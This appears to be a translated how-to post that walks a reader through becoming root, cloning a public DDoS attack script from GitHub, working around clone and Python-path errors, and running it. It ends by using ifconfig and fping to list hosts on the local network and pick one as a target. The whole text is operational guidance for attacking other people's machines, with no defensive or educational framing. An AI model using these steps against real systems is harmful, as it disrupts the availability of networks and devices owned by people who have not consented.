- sudo -i to obtain root privileges
sudo -i
- Input
cd DDos-Attack
Enter the DDos directory
Some people may encounter problems entering here
First, we check if the text is capitalized correctly
If there are no mistakes, then the file is not configured properly
Just input
git clone https://github.com/Ha3MrX/DDos-Attack
to clone, which usually solves the problem
Of course, there are many different problems that can arise. When I was doing the practical operation, it prompted me that it couldn't clone
I found many solutions online, and the one that finally worked was to replace "https" with "git", which means
git clone git://github.com/Ha3MrX/DDos-Attack
This way, the configuration can be completed.
- Continue to input chmod +x ddos-attack.py to set permissions
chmod +x ddos-attack.py
After entering this command, there will be no prompt, so make sure you input it correctly
- Enter python ddos-attack.py to enter the attack interface
python ddos-attack.py
There may also be problems here, such as the prompt of not finding the python command (I forgot the exact prompt, but it means this)
This is because python is not properly set up, possibly because you have installed too many versions of python, confusing the terminal
At this time, use "which python" to check python
which python
It should display: /usr/bin/which: no python in (/usr/lib64/bin:/usr/lib64/sbin:/usr/lib/bin)
But don't worry, this doesn't mean there is no python. We directly search for the version by inputting "which python2"
which python2
It will display this text, and we observe that python2.7 is the recognizable version
/usr/bin/python2
$ ls -l /usr/bin/python2
-rwxr-xr-x. 1 root root /usr/bin/python2.7
So all we need to do is input
$ ln -s /usr/bin/python2.7 /usr/bin/python
to solve the problem!
At this point, the following interface will appear
This means that the entry was successful
Enter the target IP in the IP column to enter the attack
But if we want to obtain the opponent's IP within the local area network, we need to input
ifconfig
First, confirm your own IP, and then use "fping -g yourIPaddress/24" to view all IPs within the local area network
fping -g yourIPaddress/24
Then select your target for the attack.